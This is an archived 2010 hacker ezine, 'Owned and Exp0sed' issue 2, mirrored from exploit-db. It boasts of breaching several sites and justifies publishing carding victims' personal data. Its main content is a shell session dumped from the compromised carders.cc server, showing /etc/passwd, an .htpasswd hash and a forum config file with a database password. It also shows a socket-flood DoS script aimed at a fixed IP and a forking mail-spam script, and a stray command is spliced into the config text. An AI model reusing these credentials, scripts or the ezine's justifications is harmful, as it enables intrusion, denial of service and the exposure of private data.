Exploit [eZine] Owned and Exposed - ISSUE no 2

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15823
Проверка EDB
  1. Пройдено
Автор
OWNED & EXP0SED
Тип уязвимости
PAPERS
Платформа
EZINE
CVE
N/A
Дата публикации
2010-12-25
Код:
                                                      |\___/|         
              -=[ISSUE - NO 2]=-                     =) ^Y^ (=        
                   -=[OF]=-                           \  ^  /         
                                                       )=*=(          
 ______________________________ __ ____________ _     /     \         
|.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |         
||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\        
||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\       
|  | |                                   ______   |__//_// ___/ __    
|  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||  
|  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||  
|  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||  
|_/   \__________________________|__|___|  ||  |___________________|  
                                        |______|                      
------------------------.++-                                          
                       / y-                                           
                      /  y-                                           
---------------------/    s/----------------------.++-                
                    /       ys+-.        |\      / y-                 
---------------\.../    /\      ys------/()/    /  y-                 
                sy      \/    /'''\      \|    /    s/-               
------------------+-++s     /-----'           /        s+-.           
---------------------/s    /-------------\.../    /\      ys          
                      -y  s               sy      \/    /'''\         
-----------------------y s---------------------++s     /-----'        
----------------------++'             |\        /s    /               
-------------------------------------/()/        -y ys                
                                      \|         -y s                 
-------------------------------------------------++'                  
                                                |_______________      
,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|   carders.cc  `\    
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|      inj3ct0r   \   
                                  ~ Featuring ~ |       ettercap   \  
      _______________|                          |___________________\ 
    /´   exploit-db  |                          !                     
   /   backtrack     |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._,
  /  free-hack       |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
 /___________________| ~ and ~                                        
                     !                                                
                                                                      
                      Out of the Blue                                 
                            into the Black                            
,_._._._._._._._|____________________________________________________ 
|_|_|_|_|_|_|_|_|___________________________________________________/ 
    ~ INTRO ~   !                                                     
                                                                      
Greetings followers, welcome to the second issue of owned and exp0sed.
This file is  encoded with UTF-8, so to view it  properly use unicode.
                                                                      
For those who are reading and laughing with us:                       
We (your happy ninjas) wish you a                                     
                                                                      
                                 ,                                    
                               _/^\_                                  
                              < hax >                                 
                               /.-.\                                  
            * MERRY *          `/&\`                                  
                              ,@.*;@,                                 
                             /_o.I %_\                                
                            (`'--:o(_@;                               
                           /`;--.,__ `')                              
                          ;@`o % O,*`'`&\                             
                         (`'--)_@ ;o %'()\                            
        * NINJA *        /`;--._`''--._O'@;                           
                        /&*,()~o`;-.,_ `""`)                          
                        /`,@ ;+& () o*`;-';\                          
                        (`""--.,_0 +% @' &()\                         
                       /-.,_    ``''--....-'`)                        
                       /@%;o`:;'--,.__   __.'\                        
                      ;*,&(); @ % &^;~`"`o;@();                       
   * HAXMAS *         /(); o^~; & ().o@*&`;&%O\                       
                      `"="==""==,,,.,="=="==="`                       
                   __.----.(\-''#####---...___...-----._              
                 '`         \)_`"""""`                                
                         .--' `)                                      
                       o(  )_-\                                       
                         `"""` `                                      
                                                                      
After our first release we got wind of some strange rumours.  So  just
to be sure, we need to clarify some facts.                            
                                                                      
So, who are we? First, lets talk about some things we are not. We  are
not an underground rival kiddy group. We are not a cyber  mafia  gang.
We are the watchmen, the hackers who quietly observe the scene. If any
skiddy community gets too big, we shut them down. If any lamer  causes
too much trouble, we shut them down. If any group keeps fucking  stuff
up, we stop them.                                                     
                                                                      
So, why are we doing this? Some people say that being a  vigilanty  is
wrong and that we are actually criminals. What can we say? This may be
true. But the way we see it, if your not part of  the  solution,  your
part of the fucking problem. These idiots spread  garbage  across  our
scene and that is why they got owned. We take pride in what is left of
the scene and we have serious problems with those who rape it.        
                                                                      
That's why we do what MUST be done.                                   
                                                                      
There are some things left we would  like  to  say  about  carders.cc.
First of all, they came back online after they got rm'ed. In the first
issue we gave our word that we would make sure carders.cc would  never
come back. Well, we delivered on that promise in this  issue.  And  as
such carders.cc has once again been eliminated. Maybe this  time  they
will get the hint.                                                    
                                                                      
Also, Heise Security said  that  we  were  a  rival  group  trying  to
capitalize on the demise of carders.cc. Apparently they weren't  happy
about our disclosure of the  carders.cc  database  that  included  the
personal information of carders.cc victims. What Heise forgot was that
with this action, all the victims of  carders.cc  got  the  chance  to
realize that they were victims of fraud. You can try to say  that  our
disclosure of the database put them at even greater risk of fraud  but
we disagree. What is more risky? Having your information  secretly  on
an "underground" carding forum where it  WILL  be  sold  and  used  in
frauduelent activity? Or, having  it  released  so  that  you  can  be
notified and take the appropriate action to mitigate the  damage  that
has been done? I know which option I'd rather have.                   
                                                                      
It is quite impressive how many people wrote about  the  Carders  Hack
without even bothering to read the zine. It is hilarious  to  see  how
the media works. Somebody writes an article, others  copy  information
from it, others copy from it again. If we take a shit in a bowl.  Then
you eat that shit and puke it back into a different bowl  for  someone
else to eat then they do the  same  thing,  what  do  you  have?  "Two
Journo's One Cup" is what you have. Fucking pathetic.                 
                                                                      
On the other hand, we'd like to thank Brian Krebs. Even if some of his
conclusions were way off the mark, he  was  still  the  first  one  to
report about carders.cc and nearly every other article  was  based  on
Brian's work. At least you didn't eat shit and regurgitate it like the
rest Brian, keep up the good work.                                    
                                                                      
Enough jibber jabber, let's get to business.  You  will  soon  realize
that our targets vary:                                                
                                                                      
We owned ettercap because we were tired of people firing that shit  up
and pretending to be a l33th4x0r sheep who think they are the greatest
hackerz with their ARP  spoofing  toolkitz..  If  you  have  installed
ettercap in the last 5 years you may want to check yo shit (;p).      
                                                                      
We owned offsec including backtrack and exploit-db  because  they  are
fucking security "expert" maggots (oops s/m/f/) who just fail so  hard
at security that we wonder  why  people  really  take  their  training
courses. We imagine it's like open mic night at the laughatorium.     
                                                                      
We owned inj3ct0r because they are lameass wannabe milw0rm kids  whose
sole purpose in life is  to  disclose  XSS  0dayz  in  Joomla  (RSnake
anyone?).                                                             
                                                                      
We owned carders.cc (AGAIN) because they  are  unable  to  learn  from
their mistakes and keep spreading garbage around the underground.     
                                                                      
We owned free-hack  because  they  are  developing  into  one  of  the
largest,  most  arrogant  script-kiddie  breeding   grounds   on   the
intertubez.                                                           
                                                                      
,_._._._._._._._|____________________________________________________ 
|_|_|_|_|_|_|_|_|___________________________________________________/ 
 ~ carders.cc ~ !                                                     
                                                                      
Here we go again. We hope that everybody was looking  forward  to  see
carders.cc getting owned again. We kept our word, didn't  we?  Let  us
begin:                                                                
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| The  ninja  guys  piss  on  you  and  your half trained monkeys or |
| whatever your leet underground team consists of.  If you continue, |
| you will be  owned over again and rm'd twice.   Also we will punch |
| you in the face.                                                   |
|____________________________________________________________________|
                                                                      
Our lazy ninja squad was too drunk to come over and punch you  in  the
fucking face. So we'll just stick to owning you  for  now.  Carders.cc
went down for a few days, but came back as if  nothing  had  happened.
They switched some server admins and installed some  new  software  in
the hopes that they would be safe. They turned on some l33t "security"
settings like PHP's "Safe Mode" and  "Openbase  Dir",  and  they  also
disabled lots of functions. All in all they thought they  were  pretty
locked down. Well, obviously they were fucking  wrong.  It's  hard  to
harden a system when everything is backdoored and unfortunately we are
just too ninja to get stopped by your silly protections. You can never
stop us. We will always  keep owning and exp0sing you.                
                                                                      
No. Matter. What. You. Try.                                           

$ uname -a
FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64

$ id
uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)

$ w
 1:24AM  up 11 days,  4:23, 0 users, load averages: 0.37, 0.48, 0.54
USER             TTY      FROM              LOGIN@  IDLE WHAT

$ alias ls="ls -la"

$ ls

total 47
drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
-rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
-rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
-r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
-rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var

$ cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin

$ cd /root

$ ls
total 412628
drwxr-xr-x  11 root       wheel           1024 Nov  8 20:33 .
drwxr-xr-x  17 root       wheel            512 Jul  3 19:12 ..
-rw-------   1 root       wheel           1856 Dec  5 23:53 .bash_history
-rw-r--r--   1 root       wheel            798 Jan 18  2010 .cshrc
-rw-------   1 root       wheel           2909 Dec  7 22:31 .history
-rw-r--r--   1 root       wheel            155 Jan 18  2010 .k5login
-rw-------   1 root       wheel             61 Jul  5 21:44 .lesshst
-rw-r--r--   1 root       wheel            303 Jan 18  2010 .login
drwx------   3 root       wheel            512 Dec  6 02:34 .mc
-rw-------   1 root       wheel            641 Nov  8 20:33 .mysql_history
-rw-r--r--   1 root       wheel            265 Jan 18  2010 .profile
drwx------   2 root       wheel            512 Nov  7 17:20 .ssh
-rw-r--r--   1 root       wheel      417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
drwxr-xr-x   3 root       wheel            512 Jul  3 00:34 backup
drwxr-xr-x   4 root       wheel            512 Nov  8 17:58 backups
drwxr-xr-x   2 root       wheel            512 Jul 20  2009 crack
-rw-r--r--   1 root       wheel           3223 Jul 20  2009 crack.zip
-rw-r--r--   1 root       wheel             85 Aug  9 03:31 ddos.php
-rw-r--r--   1 root       wheel            168 Feb  1  2010 example.php
drwxr-xr-x   3 root       wheel            512 Jul  5 00:41 greensql
-rw-r--r--   1 root       wheel             20 Aug  9 03:26 info.php
-rw-------   1 root       wheel          16877 Jul 29 20:44 mbox
drwxr-xr-x   3 root       wheel            512 Jul  3 18:59 php
drwxr-xr-x  14 carderscc  carderscc       1536 Nov  2 16:15 proftpd-1.3.3c
-rw-r--r--   1 root       wheel        4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
drwxr-xr-x   2 root       wheel            512 Nov  8 18:50 stylebackup

Mad PHP-Codez again!

$ cat ddos.php
<?php
while(1==1) {
$fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
}
?>

$ cat info.php
<?php
phpinfo();
?>

$ cat example.php
<?php
pcntl_fork();
pcntl_fork();
pcntl_fork();
pcntl_fork();

for ($i=0; $i<10; $i++) {
echo ".";
mail("[email protected]","spammtest","this is a very big message...");
}
?>

$ cd /home/carderscc

$ ls
total 18
drwxr-x---   7 carderscc  www     512 Nov 18 20:45 .
drwxr-x--x   4 root       wheel   512 Nov  1 23:54 ..
dr-xr-x---  18 carderscc  www    2560 Nov 12 23:32 carders.cc
drwxrwxr-x   2 carderscc  www     512 Dec  2 00:34 jabber.carders.cc
drwxrwxr-x  11 carderscc  www    3072 Nov  8 17:27 pma
drwxrwxrwx   2 carderscc  www    2048 Dec  6 00:40 temp
drwxrwxr-x   5 carderscc  www     512 Nov  6 19:47 vbseo

$ cd carders.cc

$ ls
total 2286
dr-xr-x---  18 carderscc  www    2560 Nov 12 23:32 .
drwxr-x---   7 carderscc  www     512 Nov 18 20:45 ..
-r-xr-x---   1 carderscc  www    1107 Dec  5 15:34 .htaccess
-r-xr-x---   1 carderscc  www      20 Nov 12 18:16 .htpasswd
dr-xr-x---   4 carderscc  www    2048 Nov 18 21:17 admincp
-r-xr-x---   1 carderscc  www   40115 Oct 29 20:53 ajax.php
-r-xr-x---   1 carderscc  www   75525 Oct 29 20:53 album.php
-r-xr-x---   1 carderscc  www   19041 Oct 29 20:52 announcement.php
dr-xr-x---   2 carderscc  www     512 Oct 29 22:39 archive
-r-xr-x---   1 carderscc  www    8668 Oct 29 20:52 asset.php
-r-xr-x---   1 carderscc  www   20406 Oct 29 20:52 assetmanage.php
-r-xr-x---   1 carderscc  www   15710 Oct 29 20:52 attachment.php
-r-xr-x---   1 carderscc  www    6658 Oct 29 20:52 attachment_inlinemod.php
-r-xr-x---   1 carderscc  www    3449 Oct 29 20:52 blog_attachment.php
-r-xr-x---   1 carderscc  www   96043 Oct 29 20:53 calendar.php
-r-xr-x---   1 carderscc  www      43 Oct 29 20:52 clear.gif
dr-xr-x---   9 carderscc  www    3584 Nov  2 00:32 clientscript
-r-xr-x---   1 carderscc  www   15270 Oct 29 20:52 converse.php
dr-xr-x---   7 carderscc  www     512 Nov  2 00:33 cpstyles
-r-xr-x---   1 carderscc  www    3231 Oct 29 20:52 cron.php
-r-xr-x---   1 carderscc  www    5139 Oct 29 20:52 css.php
dr-xr-x---   3 carderscc  www     512 Nov  2 00:33 customavatars
dr-xr-x---   3 carderscc  www     512 Nov  2 00:33 customgroupicons
dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 customprofilepics
-r-xr-x---   1 carderscc  www    1707 Oct 29 20:52 editor.php
-r-xr-x---   1 carderscc  www   46932 Oct 29 20:53 editpost.php
-r-xr-x---   1 carderscc  www    1326 Oct 29 20:52 entry.php
-r-xr-x---   1 carderscc  www   30006 Oct 29 20:53 external.php
-r-xr-x---   1 carderscc  www    9888 Oct 29 20:52 faq.php
-r-xr-x---   1 carderscc  www    5430 Jul 29 15:42 favicon.ico
-r-xr-x---   1 carderscc  www   22568 Oct 29 20:53 forum.php
-r-xr-x---   1 carderscc  www   42374 Oct 29 20:53 forumdisplay.php
-r-xr-x---   1 carderscc  www    1988 Oct 29 20:52 global.php
-r-xr-x---   1 carderscc  www  155760 Oct 29 20:54 group.php
-r-xr-x---   1 carderscc  www   26072 Oct 29 20:53 group_inlinemod.php
-r-xr-x---   1 carderscc  www   11470 Oct 29 20:53 groupsubscription.php
-r-xr-x---   1 carderscc  www    8961 Oct 29 20:53 image.php
dr-xr-x---  28 carderscc  www    1536 Nov 22 16:54 images
dr-xr-x---   9 carderscc  www    6144 Nov  6 19:47 includes
-r-xr-x---   1 carderscc  www    2318 Oct 29 20:53 index.php
-r-xr-x---   1 carderscc  www   46943 Oct 29 20:53 infraction.php
-r-xr-x---   1 carderscc  www  187725 Oct 29 20:54 inlinemod.php
-r-xr-x---   1 carderscc  www   23934 Jul 29 21:10 invites.php
-r-xr-x---   1 carderscc  www    6778 Aug 14 08:15 itrader.php
-r-xr-x---   1 carderscc  www   14964 Aug 14 08:15 itrader_detail.php
-r-xr-x---   1 carderscc  www   13515 Aug 14 08:15 itrader_feedback.php
-r-xr-x---   1 carderscc  www    1405 Aug 14 08:15 itrader_global.php
-r-xr-x---   1 carderscc  www   22171 Aug 14 08:15 itrader_main.php
-r-xr-x---   1 carderscc  www    3970 Aug 14 08:15 itrader_report.php
-r-xr-x---   1 carderscc  www   11362 Oct 29 20:53 joinrequests.php
-r-xr-x---   1 carderscc  www    1643 Oct 29 20:53 list.php
-r-xr-x---   1 carderscc  www   10869 Oct 29 20:53 login.php
dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 madp
-r-xr-x---   1 carderscc  www   30166 Oct 29 20:53 member.php
-r-xr-x---   1 carderscc  www   16314 Oct 29 20:53 member_inlinemod.php
-r-xr-x---   1 carderscc  www   40267 Oct 29 20:53 memberlist.php
-r-xr-x---   1 carderscc  www   22186 Oct 29 20:53 misc.php
dr-xr-x---   2 carderscc  www     512 Nov  6 19:48 modcp
-r-xr-x---   1 carderscc  www   76749 Oct 29 20:53 moderation.php
-r-xr-x---   1 carderscc  www    6701 Oct 29 20:53 moderator.php
-r-xr-x---   1 carderscc  www   17474 Oct 29 20:53 newattachment.php
-r-xr-x---   1 carderscc  www   41001 Oct 29 20:53 newreply.php
-r-xr-x---   1 carderscc  www   20107 Oct 29 20:53 newthread.php
-r-xr-x---   1 carderscc  www   21724 Oct 29 20:53 online.php
dr-xr-x---   5 carderscc  www     512 Nov  2 00:33 packages
-r-xr-x---   1 carderscc  www    8018 Oct 29 20:53 payment_gateway.php
-r-xr-x---   1 carderscc  www   13282 Oct 29 20:53 payments.php
-r-xr-x---   1 carderscc  www    3984 Oct 29 20:53 picture.php
-r-xr-x---   1 carderscc  www   16587 Oct 29 20:53 picture_inlinemod.php
-r-xr-x---   1 carderscc  www   26091 Oct 29 20:53 picturecomment.php
-r-xr-x---   1 carderscc  www   29260 Oct 29 20:53 poll.php
-r-xr-x---   1 carderscc  www   10336 Oct 29 20:53 posthistory.php
-r-xr-x---   1 carderscc  www   76507 Oct 29 20:54 postings.php
-r-xr-x---   1 carderscc  www    7009 Oct 29 20:53 printthread.php
-r-xr-x---   1 carderscc  www   79357 Oct 29 20:54 private.php
-r-xr-x---   1 carderscc  www  163617 Oct 29 20:55 profile.php
-r-xr-x---   1 carderscc  www   56285 Oct 29 20:54 register.php
-r-xr-x---   1 carderscc  www    7216 Oct 29 20:53 report.php
-r-xr-x---   1 carderscc  www   14687 Oct 29 20:53 reputation.php
-r-xr-x---   1 carderscc  www   34539 Oct 29 20:54 search.php
-r-xr-x---   1 carderscc  www   22632 Oct 29 20:54 sendmessage.php
-r-xr-x---   1 carderscc  www   12407 Oct 29 20:54 showgroups.php
-r-xr-x---   1 carderscc  www   12660 Oct 29 20:54 showpost.php
-r-xr-x---   1 carderscc  www   80037 Oct 29 20:54 showthread.php
dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 signaturepics
dr-xr-x---   2 carderscc  www     512 Nov  2 00:32 store_sitemap
-r-xr-x---   1 carderscc  www   38784 Oct 29 20:54 subscription.php
-r-xr-x---   1 carderscc  www    5321 Oct 29 20:54 tags.php
-r-xr-x---   1 carderscc  www    8722 Oct 29 20:54 threadrate.php
-r-xr-x---   1 carderscc  www   11068 Oct 29 20:54 threadtag.php
-r-xr-x---   1 carderscc  www      61 Oct 29 20:52 uploadprogress.gif
-r-xr-x---   1 carderscc  www   39639 Oct 29 20:54 usercp.php
-r-xr-x---   1 carderscc  www   20956 Oct 29 20:54 usernote.php
-r-xr-x---   1 carderscc  www   16518 Jul 29 16:35 vaispy.php
dr-xr-x---  13 carderscc  www    1024 Nov  2 00:32 vb
dr-xr-x---   4 carderscc  www     512 Nov  6 19:48 vbseo
-r-xr-x---   1 carderscc  www   45239 Nov  6 19:48 vbseo.php
-r-xr-x---   1 carderscc  www    4112 Nov  6 19:47 vbseocp.php
-r-xr-x---   1 carderscc  www   27801 Oct 29 20:54 visitormessage.php
-r-xr-x---   1 carderscc  www    1647 Oct 29 20:54 widget.php
-r-xr-x---   1 carderscc  www    3769 Oct 29 20:54 xmlsitemap.php

$ cat .htpasswd
ddos:XScRLnTwdeJ6k

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.3 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

        //      ****** DATABASE TYPE ******
        //      This is the type of the database server on which your vBulletin database will be located.
        //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
        // for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

        //      ****** DATABASE NAME ******
        //      This is the name of the database where your vBulletin will be located.
        //      This must be created by your webhost.
$config['Database']['dbname'] = 'carderscc_01';

        //      ****** TABLE PREFIX ******
        //      Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

        //      ****** TECHNICAL EMAIL ADDRESS ******
        //      If any database errors occur, they will be emailed to the address specified here.
        //      Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '[email protected]';

        //      ****** FORCE EMPTY SQL MODE ******
        // New versions of MySQL (4.1+) have introduced some behaviors that are
        // incompatible with vBulletin. Setting this value to "true" disables those
        // behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



        //      ****** MASTER DATABASE SERVER NAME AND PORT ******
        //      This is the hostname or IP address and port of the database server.
        //      If you are unsure of what to put herecat ddos.php




, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

        //      ****** MASTER DATABASE USERNAME & PASSWORD ******
        //      This is the username and password you use to access MySQL.
        //      These must be obtained through your webhost.
$config['MasterServer']['username'] = 'carderscc_01';
$config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg$dh3jgduzgdUGZDufe76g3d';

        //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
        //      This option allows you to turn persistent connections to MySQL on or off.
        //      The difference in performance is negligible for all but the largest boards.
        //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



        //      ****** SLAVE DATABASE CONFIGURATION ******
        //      If you have multiple database backends, this is the information for your slave
        //      server. If you are not 100% sure you need to fill in this information,
        //      do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



        //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
        //      This setting allows you to change the name of the folders that the admin and
        //      moderator control panels reside in. You may wish to do this for security purposes.
        //      Please note that if you change the name of the directory here, you will still need
        //      to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';

        //      Prefix that all vBulletin cookies will have
        //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

        //      ******** FULL PATH TO FORUMS DIRECTORY ******
        //      On a few systems it may be necessary to input the full path to your forums directory
        //      for vBulletin to function normally. You can ignore this setting unless vBulletin
        //      tells you to fill this in. Do not include a trailing slash!
        //      Example Unix:
        //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
        //      Example Win32:
        //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



        //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
        //      The users specified here will be allowed to view the admin log in the control panel.
        //      Users must be specified by *ID number* here. To obtain a user's ID number,
        //      view their profile via the control panel. If this is a new installation, leave
        //      the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '4835,9816';

        //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
        //      The users specified here will be allowed to remove ("prune") entries from the admin
        //      log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '4835,9816';

        //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
        //      The users specified here will be allowed to run queries from the control panel.
        //      See the above entries for more information on the format.
        //      Please note that the ability to run queries is quite powerful. You may wish
        //      to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '4835,9816';

        //      ****** UNDELETABLE / UNALTERABLE USERS ******
        //      The users specified here will not be deletable or alterable from the control panel by any users.
        //      To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

        //      ****** SUPER ADMINISTRATORS ******
        //      The users specified below will have permission to access the administrator permissions
        //      page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '4835,9816';

        // ****** DATASTORE CACHE CONFIGURATION *****
        // Here you can configure different methods for caching datastore items.
        // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
        // vB_Datastore_APC - to use APC
        // vB_Datastore_XCache - to use XCache
        // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

        // ******** DATASTORE PREFIX ******
        // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
        // than one set of forums installed on your host, you *may* need to use a prefix
        // so that they do not try to use the same variable within the cache.
        // This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

        // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
$config['Misc']['memcacheport'][$i]                     = 11211;
$config['Misc']['memcachepersistent'][$i]       = true;
$config['Misc']['memcacheweight'][$i]           = 1;
$config['Misc']['memcachetimeout'][$i]          = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

        //      ****** MySQLI OPTIONS *****
        // When using MySQL 4.1+, MySQLi should be used to connect to the database.
        // If you need to set the default connection charset because your database
        // is using a charset other than latin1, you can set the charset here.
        // If you don't set the charset to be the same as your database, you
        // may receive collation errors.  Ignore this setting unless you
        // are sure you need to use it.
$config['Mysqli']['charset'] = 'latin1';

        //      Optionally, PHP can be instructed to set connection parameters by reading from the
        //      file named in 'ini_file'. Please use a full path to the file.
        //      Example:
        //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '/etc/my.cnf';

// Image Processing Options
        // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/

$ cd ..

$ cd jabber.carders.cc

$ ls
total 812
drwxrwxr-x  2 carderscc  www     512 Dec  2 00:34 .
drwxr-x---  7 carderscc  www     512 Nov 18 20:45 ..
-rwxrwxr-x  1 carderscc  www    7948 Apr 28  2008 AC_OETags.js
-rwxrwxr-x  1 carderscc  www  629979 Apr 28  2008 SparkWeb.swf
-rw-r--r--  1 carderscc  www  128693 Dec  2 00:34 c100.txt
-rwxrwxr-x  1 carderscc  www    3638 Apr 28  2008 favicon.ico
-rwxrwxr-x  1 carderscc  www    1272 Apr 28  2008 history.htm
-rwxrwxr-x  1 carderscc  www    1292 Apr 28  2008 history.js
